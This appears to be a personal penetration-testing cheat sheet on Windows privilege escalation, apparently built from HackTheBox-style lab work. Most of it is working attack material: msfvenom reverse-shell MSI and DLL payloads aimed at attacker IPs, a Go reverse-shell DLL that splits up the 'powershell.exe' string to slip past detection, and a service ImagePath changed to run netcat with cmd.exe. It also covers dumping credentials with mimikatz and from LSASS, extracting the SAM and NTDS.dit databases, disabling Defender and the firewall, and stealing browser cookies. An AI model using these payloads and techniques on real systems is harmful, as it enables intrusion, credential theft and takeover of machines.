Windows Privilege Escalation
Windows Privilege Escalation
General and Useful shortlist command
powershell -ex bypass
add user
net user /add username password
add user to group
net localgroup groupname /add user
net group "Exchange Windows Permissions" svc-alfresco /add /domain
Enable rdp (need administrator)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable firewall
netsh advfirewall set allprofiles state off
Enable only remote desktop
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Using nxc
netexec smb $IP -u administrator -p pass123 -M rdp -o ACTION=enable
Check permission on file or dir
cacls .
icacls .
share smb (on attacker machine)
impacket-smbserver -smb2support nameshare folder
Run as
run as /user:domain\samaccountname cmd.exe
Sharing folder using
Dir properties
-> https://youtu.be/jBfdlLybMek?si=qd9bu1ch_VPBO4Cm&t=8408
Initial Enumeration
User and Groups Enumeration
Logged-In user
query user
Current User
echo %USERNAME
Privilges
whoami /priv
whoami /alll
Groups Information
whoami /groups
All User on local machine
net user
net user /domain
All grous
net localgroup
Details about user
net user samname
net user samname /domain
Detail about a group
net localgroup administrators
Pass policy
net accounts
Local User Description
Get-LocalUser
Computer Description
Get-WmiObject -Class Win32_OperatingSystem | select Description
OS and Process Enumeration
Info About OS
Get-WmiObject Win32_OperatingSystem | select -Property *
Process Running
tasklist /svc
Env variables
set
Systeminfo
systeminfo
Patches and Updates
wmic qfe
Get-HotFix | ft -AutoSize
Installed programs
wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version
Get-CimInstance -ClassName Win32_Product
Running Programs
Get-WmiObject Win32_Process | Format-List *
Running process and owner (not always work)
# other solution
Get-WmiObject Win32_Process | ForEach-Object {
$process = $_
$owner = $process.GetOwner()
[PSCustomObject]@{
ProcessName = $process.Name
ProcessId = $process.ProcessId
User = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { "N/A" }
}
} | Format-Table -AutoSize
# other solution
Get-CimInstance Win32_Process | ForEach-Object {
$process = $_
$owner = Invoke-CimMethod -MethodName GetOwner -InputObject $process
Write-Host $process.name $owner
}
# other solution
$owners = @{}
gwmi win32_process |% {try {$owners[$_.handle] = $_.getowner().user} catch{} }
(get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}})
Get process on main windows (displayed)
gps | ? { $_.MainWindowTitle }
Running Process with open port
netstat -ano
Get all services
Get-CimInstance -ClassName Win32_service
sc query
sc query state= all | findstr "SERVICE_NAME"
Get info about services
Get-Service "ServiceName"
Get all scheduled tasks
schtasks /query /fo LIST /v
Enumerate installed programs
wmic product get name
Enumerate local ports
netstat -ano | findstr 6064
Enumerate Process ID
get-process -Id 3324
gps -Id 3324
Enumerate Running Service
get-service | ? {$_.DisplayName -like 'Druva*'}
Get-CimInstance Win32_Service | Format-List *
Modifying PowerShell Execution Policy
Set-ExecutionPolicy Bypass -Scope Process
Installed Programs without permission (works on winrm)
Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Search program by name
Get-CimInstance -ClassName Win32_Product | Where-Object { $_.Name -like "*name*" } | Select-Object Name, Version
Process Monitor
procmon from powershell
while($true){
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1 $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2}
sysinternals
Procmon.exe
How use procmon from command line
procmon.exe /Minimized /Quiet /Backingfile C:\Logs\procmon.pml
Start-Sleep -Seconds 10
procmon.exe /Terminate
procmon.exe /OpenLog C:\Logs\procmon.pml /SaveAs C:\Logs\procmon.csv /SaveFilter /Minimized
Enumerate all services and process and print also current owner
# Function to get the owner of a process
function Get-ProcessOwner {
param (
[System.Diagnostics.Process]$Process
)
try {
$processHandle = $Process.Handle
$processSecurity = Get-WmiObject Win32_Process -Filter "Handle = '$processHandle'"
$owner = $processSecurity.GetOwner()
return "$($owner.Domain)\$($owner.User)"
} catch {
return "N/A"
}
}
# Enumerate all processes
Write-Host "Processes:"
Get-Process | ForEach-Object {
$owner = Get-ProcessOwner $_
Write-Host "Process: $($_.Name) - ProcessId: $($_.Id) - Owner: $owner"
}
# Function to get the owner of a service
function Get-ServiceOwner {
param (
[string]$ServiceName
)
try {
$service = Get-WmiObject Win32_Service -Filter "Name = '$ServiceName'"
$owner = $service.GetOwner()
return "$($owner.Domain)\$($owner.User)"
} catch {
return "N/A"
}
}
# Enumerate all services
Write-Host "`nServices:"
Get-Service | ForEach-Object {
$owner = Get-ServiceOwner $_.Name
$serviceId = $_.Id
Write-Host "Service: $($_.Name) - ServiceId: $serviceId - Owner: $owner"
}
Network
Get Info About IP and network card
ipconfig /all
ARP Table:
arp -a
Routing table
route print
Enumeration Protection
Windows Defender
Get-MpComputerStatus
AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test AppLocker
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Disable realtime
Set-MpPreference -DisableRealtimeMonitoring $true
Named Pipe
Searching File & Creds
Searching File
tree /f /a
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
Find file
dir /s/b filename
dir /s/b \filename # on all system
dir /s/b *.log
dir /s/b *.txt
dir /s/b *.doc*
dir /s/b *.zip
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search only file name:
findstr /SI /M "password" *.xml *.ini *.txt
Search file content CMD:
findstr /si password *.xml *.ini *.txt *.config
Search file content PowerShell
select-string -Path <path>*.txt -Pattern password
Search file extension CMD
where /R C:\ *.config
Search file extension PowerShell
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Interesting File/Directories
From file extract extract password
gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Interesting file
Unattend.xml
Sticky notes
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
PowerShell history
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Powershell Command
Get-Credential API
Import-Clixml
Export-Clixml
runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Saved Credentials List
cmdkey /list
Execute SharpChrome for extracting data from DPAPI - https://github.com/GhostPack/SharpDPAPI/blob/master/README.md
SharpChrome.exe logins /unprotect
Password Manager
Keepass ->
kdbx
->keepass2jhon
->hashcat/jhon
Mail
MailSniper
Lazagne - https://github.com/AlessandroZ/LaZagne - Credentials recovery project
lazagne.exe all
SessionGopher
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
Clear-Text Password in the Registry
Windows Autologon - If 1 is enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Putty session file
Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
Wifi Password
netsh wlan show profile
netsh wlan show profile name="Wifi" key=clear
VHDX/VMDK
Mount Linux
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
Windows -> Mount-VHD Mount-VHD
Resources -> Extract VMDK
Misconfiguration
AlwaysInstallelevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploit
Import-Module .\PowerUp.ps1
Write-UserAddMSI
Generating MSI
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
Execute MSI
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
BypassUAC - user account control
Bypass-UAC - Bypass-UAC
Share with write permssion
SCF on a File Share
Icon on attacker machine UNC
IconFile=\\10.10.14.3\share\legit.ico
Starting
Responder
/Inveigh
/InveighZero
Cracking using
hashcat -m 5600
Malicious
lnk
file - LnkBomb LnkBomb
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Pillaging
Enumerate Installed applications
dir "C:\Program Files"
Using Registry Key
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
Enumerate Installed services
Websites
File Shares
Databases
Directory Services (such as Active Directory, Azure AD, etc.)
Name Servers
Deployment Services
Certificate Authority
Source Code Management Server
Virtualization
Messaging
Monitoring and Logging Systems
Backups
Sensitive Data
Keylogging
Clipboard - Invoke-Clipboard
Screen Capture
Network Traffic Capture
Previous Audit reports
User Information
History files, interesting documents (.doc/x,.xls/x,password/.pass, etc)
Roles and Privileges
Web Browsers
Firefox
%APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
CookieExtractor CookieExtractor
Chrome
SharpChromium - SharpChromium
Fix copy for Invoke-SharpChromium
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
InvokeSharpChromium - Invoke-SharpChromium
IM Clients
Slack/Teams
If Administrator privilege, we can run mimikatz
Run mimikatz mimikatz
mimikatz.exe
privilege:debug
log
sekurlsa::logonpassword
Windows User Privileges
SeImpersonate and SeAssignPrimaryToken
SeDebugPrivilege
Using procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Exploit SYSTEM from child process
Get info about winlogon
tasklist
# proc id of winlogon of lsass
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe", "")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe", "")
SeTakeOwnershipPrivilege
Import-Module .\Enable-Privilege.ps1
https://github.com/fashionproof/EnableAllTokenPrivs
.\EnableAllTokenPrivs.ps1
Choosing Target File
Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
Checking File Ownership
cmd /c dir /q 'C:\\Department Shares\\Private\\IT'
Take Ownership
takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'
Modify FILE ACL
icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F
Windows Groups Privileges
Backup Operators
Enable Flag SeBackupPrivileg https://github.com/giuliano108/SeBackupPrivilege
Resources -> Exploit
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Start backup
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
save system
reg save HKLM\\SYSTEM SYSTEM.SAV`
reg save hklm\system C:\temp\system.hive`
save sam
reg save HKLM\SAM SAM.SAV
reg save hklm\sam C:\temp\sam.hive
extracting using impacket
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Extracting Cred from NTDS.dit
Install-Module DSInternals -Force
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\\SYSTEM # or system.sav dipende da come lo abbiamo salvato prima
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
Extracting
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
Create a copy
robocopy /B E:\Windows\\NTDS .\ntds ntds.dit
Event Log Readers
net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
DnsAdmins
Generate malicious dll
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Get info about group DNSAdmins
Get-ADGroupMember -Identity DnsAdmins
Change dll
dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
Restart DNS Services (could be distruptive)
sc stop DNS
sc start DNS
Get SID user
wmic useraccount where name="netadm" get sid
Check permission on
DNSService
sc.exe sdshow DNS
Hyper-V Administrators
Print Operators - SeLoadDriverPrivilege
whoami /priv
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Capcom.sys - Add Reference Driver
reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"
EnablePrivilges
EnableSeLoadDriverPrivilege.exe
Verifiy Driver is Loaded
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
Use ExploitCapcom
.\ExploitCapcom.exe
Use EoPLoadDriver
Clean
reg delete HKCU\\System\\CurrentControlSet\\Capcom
Server Operators
Find Services that run in SYSTEM ad es., AppReadiness
sc qc AppReadiness
Check Permission with PsService
c:\Tools\PsService.exe security AppReadiness
Change binPath
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start Service
sc start AppReadiness
User Account Control
Checking if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Checking UAC Level
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Checking Windows Version
[environment]::OSVersion.Version
Reviewing PATH
cmd /c echo %PATH%`
UAC bypass
UACME - UACME
UAC Mocking dir - uac-bypass-by-mocking-trusted-directories
Bypass UAC - Bypass-UAC
Weak Permission
Permissive File System ACLs
Using
Sharphound.exe audit
for searching services modifiable ad es., SecurityService
Check permission
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Change executable
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Restart Services
sc start SecurityService
Weak Service Permissions
Run
Sharphound.exe audit
Using
accesschk
for reviewing permission about services
accesschk.exe /accepteula -quvcw WindscribeService
Query all services
sc query
Change binpath
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
Stop service
sc stop WindscribeService
Restart
sc start WindscribeService
Reverting to initial state
sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"
sc start WindScribeService`
In casi di permesso di shutdown e il servizio è autorun
shutdown -r -t 1
Unquoted Services
Querying service
sc qc SystemExplorerHelpService
Searching unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Scheduled Task
schtasks /query /fo LIST /v
schtask /query /fo LIST /v /FN "Name"
Get-ScheduledTask | select TaskName,State
Permissive Registry ACLs
Checking Weak Service ACLs in Registry
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Changing ImagePath with PowerShell
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
Modifiable Registry Autorun Binary
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/LogonAutostartExecutionRegistryRunKeys.md
Kernel Exploit
List vuln windows: https://msrc.microsoft.com/update-guide/vulnerability
wmic qfe list brief
LOLBAS
Collection
LOLBAS - LOLBAS
Transfer file
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
Encodign File
certutil -encode file1 encodedfile
Decoding file
Certutil -decode encodedfile file2
Execute dll
rundll32.exe file.dll,methodName
DLL Injection/Hijacking
DLL injection
is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.
Execute an arbitrary DLL inside another process
Locate the process to inject the malicious DLL
CreateToolhelp32Snapshot
,Process32First
,Process32Next
Open the process:
GetModuleHandle
,GetProcAddress
,OpenProcess
Write the path to the DLL inside the process:
VirtualAllocEx
,WriteProcessMemory
Create a thread in the process that will load the malicious DLL CreateRemoteThread, LoadLibrary
Other functions to use: NTCreateThreadEx, RtlCreateUserThread
LoadLibrary
Manual Mapping
Resources
DLL Injection Hacktips - DLL Injection
IredTeam DLL Injection - IredTeam-DLL Injection
DLL Hijacking
DLL Hijacking
is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.DLL Replacement: replace a legitimate DLL with an evil DLL. Combined with DLL Proxying
DLL Search Order Hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL Ref -[Ref.]
Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.
DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or
.exe.manifest
/.exe.local
.Ref [Ref.]WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often DLL side-loading. Ref - [Ref.]
Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.
Find Missing DLL
procmon
→filter
→Results contain not Found
and →Paths end with .dll
To escalate privileges
Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
Ensure write access is available for any directory in which the DLL will be searched for
icacls “Path-To-Dir”
Tools
winpeas
siofra
- Siofrapowersploit
Find-ProcessDLLHijack
Find-PathDLLHijack
Write-HijackDll
Resources
DLL Hijacking Hacktricks - DLL Hijacking
DLL Hijacking Prives - DLL Hijacking PrivEsc
Hacking dlls in windows - hijacking-dlls-in-windows
tcapt dll hijacking - tcapt-dll-hijacking
DLL Hijacking - DLL Hijacking
DLL Reflective
Resources
Reflective DLL Injection: Reflective DLL Injection
DLL SideLoading
Resources
Dll sideloading proxying dll-sideloading-proxying
DLL Proxying
Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.
Get RevShell (N.B. is very important arch used)
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll
msfconsole
->use multi/handler
Write Code
How to compile dll
x64
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
x86
i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
Link to
Windows Sockets 2
, necessary for rev shell
i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
Alternative use
VisualStudio e C#
Using go:
package main
import (
"C"
"os/exec"
"net"
)
//export VerifyThemeVersion
func VerifyThemeVersion(){
main()
}
func main() {
dst := "192.168.1.152" // set ip
pnum := "9999" // set port
connstring := dst + ":" + pnum
prot := "tcp"
netData, _ := net.Dial(prot, connstring)
shell := exec.Command("pow" + "er" + "she" + "ll.e" + "xe")
shell.Stdin=netData
shell.Stdout=netData
shell.Stderr=netData
shell.Run()
}
# x86
OOS=windows GOARCH=386 CGO_ENABLED=1 CC=i686-w64-mingw32-gcc go build -buildmode=c-shared -o main.dll reverse_shell.go
#amd64
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o evil.dll ./calculator.go
How to check if DLL work
rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll
rundll32.exe injection.dll,0
Tools
Procmon
Process Explorer
VisualStudio
Resources
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/tree/master
Tools
Last updated